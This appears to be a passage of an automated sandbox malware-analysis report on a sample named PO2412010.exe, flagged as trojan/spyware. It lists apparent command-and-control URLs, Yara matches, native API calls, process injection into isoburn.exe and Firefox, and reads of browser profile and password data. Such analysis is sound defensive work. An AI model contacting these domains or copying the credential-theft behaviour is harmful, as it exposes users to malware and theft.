                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 10 Dec 2024 14:17:44 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 10 Dec 2024 14:17:47 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Tue, 10 Dec 2024 14:17:54 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Tue, 10 Dec 2024 14:17:57 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Tue, 10 Dec 2024 14:17:59 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.25.3 Date: Tue, 10 Dec 2024 14:18:02 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 203 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Tue, 10 Dec 2024 14:18:12 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Tue, 10 Dec 2024 14:18:15 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=iso-8859-1 content-length: 196 date: Tue, 10 Dec 2024 14:18:18 GMT server: LiteSpeed x-tuned-by: N0C connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: PO2412010.exe, 00000000.00000002.1432296932.0000000002631000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: duvyEsVvTpq.exe, 00000009.00000002.3835836980.0000000003BA8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP
                Source: duvyEsVvTpq.exe, 00000009.00000002.3838073640.0000000005973000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.smartcongress.net
                Source: duvyEsVvTpq.exe, 00000009.00000002.3838073640.0000000005973000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.smartcongress.net/qtfx/
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: isoburn.exe, 00000006.00000003.1998564179.0000000007812000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10332
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033h
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033l
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: isoburn.exe, 00000006.00000002.3832319605.0000000002909000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: isoburn.exe, 00000006.00000002.3837163739.00000000051C6000.00000004.10000000.00040000.00000000.sdmp, duvyEsVvTpq.exe, 00000009.00000002.3835836980.0000000003A16000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.cstrategy.online/qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC
                Source: isoburn.exe, 00000006.00000002.3839590417.0000000007828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

                E-Banking Fraud

                Source: Yara match File source: 3.2.PO2412010.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 3.2.PO2412010.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000003.00000002.1811060846.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3828928814.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3835997745.00000000043F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.1811863251.0000000001980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3835510963.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000009.00000002.3838073640.00000000058D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.3835472145.0000000002ED0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.1813283788.0000000001F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_0042C663 NtClose,3_2_0042C663
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2B60 NtClose,LdrInitializeThunk,3_2_01AC2B60
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01AC2DF0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01AC2C70
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC35C0 NtCreateMutant,LdrInitializeThunk,3_2_01AC35C0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC4340 NtSetContextThread,3_2_01AC4340
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC4650 NtSuspendThread,3_2_01AC4650
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2BA0 NtEnumerateValueKey,3_2_01AC2BA0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2B80 NtQueryInformationFile,3_2_01AC2B80
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2BE0 NtQueryValueKey,3_2_01AC2BE0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2BF0 NtAllocateVirtualMemory,3_2_01AC2BF0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2AB0 NtWaitForSingleObject,3_2_01AC2AB0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2AF0 NtWriteFile,3_2_01AC2AF0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2AD0 NtReadFile,3_2_01AC2AD0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2DB0 NtEnumerateKey,3_2_01AC2DB0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2DD0 NtDelayExecution,3_2_01AC2DD0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2D30 NtUnmapViewOfSection,3_2_01AC2D30
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2D00 NtSetInformationFile,3_2_01AC2D00
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2D10 NtMapViewOfSection,3_2_01AC2D10
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2CA0 NtQueryInformationToken,3_2_01AC2CA0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2CF0 NtOpenProcess,3_2_01AC2CF0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2CC0 NtQueryVirtualMemory,3_2_01AC2CC0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2C00 NtQueryInformationProcess,3_2_01AC2C00
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2C60 NtCreateKey,3_2_01AC2C60
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2FA0 NtQuerySection,3_2_01AC2FA0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2FB0 NtResumeThread,3_2_01AC2FB0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2F90 NtProtectVirtualMemory,3_2_01AC2F90
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2FE0 NtCreateFile,3_2_01AC2FE0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2F30 NtCreateSection,3_2_01AC2F30
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2F60 NtCreateProcessEx,3_2_01AC2F60
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2EA0 NtAdjustPrivilegesToken,3_2_01AC2EA0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2E80 NtReadVirtualMemory,3_2_01AC2E80
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2EE0 NtQueueApcThread,3_2_01AC2EE0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC2E30 NtWriteVirtualMemory,3_2_01AC2E30
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC3090 NtSetValueKey,3_2_01AC3090
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC3010 NtOpenDirectoryObject,3_2_01AC3010
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC39B0 NtGetContextThread,3_2_01AC39B0
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC3D10 NtOpenProcessToken,3_2_01AC3D10
                Source: C:\Users\user\Desktop\PO2412010.exe Code function: 3_2_01AC3D70 NtOpenThread,3_2_01AC3D70
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E4650 NtSuspendThread,LdrInitializeThunk,6_2_045E4650
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E4340 NtSetContextThread,LdrInitializeThunk,6_2_045E4340
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_045E2C70
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2C60 NtCreateKey,LdrInitializeThunk,6_2_045E2C60
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_045E2CA0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_045E2D10
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_045E2D30
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2DD0 NtDelayExecution,LdrInitializeThunk,6_2_045E2DD0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_045E2DF0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_045E2EE0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_045E2E80
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2F30 NtCreateSection,LdrInitializeThunk,6_2_045E2F30
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2FE0 NtCreateFile,LdrInitializeThunk,6_2_045E2FE0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2FB0 NtResumeThread,LdrInitializeThunk,6_2_045E2FB0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2AD0 NtReadFile,LdrInitializeThunk,6_2_045E2AD0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2AF0 NtWriteFile,LdrInitializeThunk,6_2_045E2AF0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2B60 NtClose,LdrInitializeThunk,6_2_045E2B60
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_045E2BF0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_045E2BE0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_045E2BA0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E35C0 NtCreateMutant,LdrInitializeThunk,6_2_045E35C0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E39B0 NtGetContextThread,LdrInitializeThunk,6_2_045E39B0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2C00 NtQueryInformationProcess,6_2_045E2C00
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2CC0 NtQueryVirtualMemory,6_2_045E2CC0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2CF0 NtOpenProcess,6_2_045E2CF0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2D00 NtSetInformationFile,6_2_045E2D00
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2DB0 NtEnumerateKey,6_2_045E2DB0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2E30 NtWriteVirtualMemory,6_2_045E2E30
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2EA0 NtAdjustPrivilegesToken,6_2_045E2EA0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2F60 NtCreateProcessEx,6_2_045E2F60
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2F90 NtProtectVirtualMemory,6_2_045E2F90
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2FA0 NtQuerySection,6_2_045E2FA0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2AB0 NtWaitForSingleObject,6_2_045E2AB0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E2B80 NtQueryInformationFile,6_2_045E2B80
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E3010 NtOpenDirectoryObject,6_2_045E3010
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E3090 NtSetValueKey,6_2_045E3090
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E3D70 NtOpenThread,6_2_045E3D70
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_045E3D10 NtOpenProcessToken,6_2_045E3D10
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_02649210 NtReadFile,6_2_02649210
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_02649300 NtDeleteFile,6_2_02649300
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_026493A0 NtClose,6_2_026493A0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_026490A0 NtCreateFile,6_2_026490A0
                Source: C:\Windows\SysWOW64\isoburn.exe Code function: 6_2_02649510 NtAllocateVirtualMemory,6_2_02649510
                Source: PO2412010.exe, 00000000.00000002.1441177729.0000000008C50000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000000.1374367712.00000000001E2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamebsOm.exeJ vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1435053363.0000000003631000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1431476872.00000000008BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1435053363.0000000003679000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1435053363.0000000003679000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs PO2412010.exe
                Source: PO2412010.exe, 00000000.00000002.1438950358.0000000006F70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs PO2412010.exe
                Source: PO2412010.exe, 00000003.00000002.1812197126.0000000001B7D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PO2412010.exe
                Source: PO2412010.exe, 00000003.00000002.1811368240.00000000015F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameISOBURN.EXEj% vs PO2412010.exe
                Source: PO2412010.exe Binary or memory string: OriginalFilenamebsOm.exeJ vs PO2412010.exe
                Source: PO2412010.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO2412010.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, zkasvJmNDA2aRwVk8j.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, eo2nyduXLjvfmNwJ5V.cs Security API names: _0020.SetAccessControl
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, eo2nyduXLjvfmNwJ5V.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO2412010.exe.3726980.0.raw.unpack, eo2nyduXLjvfmNwJ5V.cs Security API names: _0020.AddAccessRule
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, zkasvJmNDA2aRwVk8j.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, eo2nyduXLjvfmNwJ5V.cs Security API names: _0020.SetAccessControl
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, eo2nyduXLjvfmNwJ5V.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.PO2412010.exe.8c50000.4.raw.unpack, eo2nyduXLjvfmNwJ5V.cs Security API names: _0020.AddAccessRule
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@19/12
                Source: C:\Users\user\Desktop\PO2412010.exe Mutant created: NULL
                Source: C:\Users\user\Desktop\PO2412010.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\isoburn.exe File created: C:\Users\user\AppData\Local\Temp\l420377x
                Source: PO2412010.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO2412010.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\PO2412010.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: isoburn.exe, 00000006.00000003.1999508554.0000000002945000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.2001948151.0000000002972000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000003.1999508554.0000000002966000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3832319605.0000000002994000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000006.00000002.3832319605.0000000002966000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO2412010.exe ReversingLabs: Detection: 36%
                Source: unknown Process created: C:\Users\user\Desktop\PO2412010.exe "C:\Users\user\Desktop\PO2412010.exe"
                Source: C:\Users\user\Desktop\PO2412010.exe Process created: C:\Users\user\Desktop\PO2412010.exe "C:\Users\user\Desktop\PO2412010.exe"
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\PO2412010.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\isoburn.exe Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe Section loaded: fwpuclnt.dll
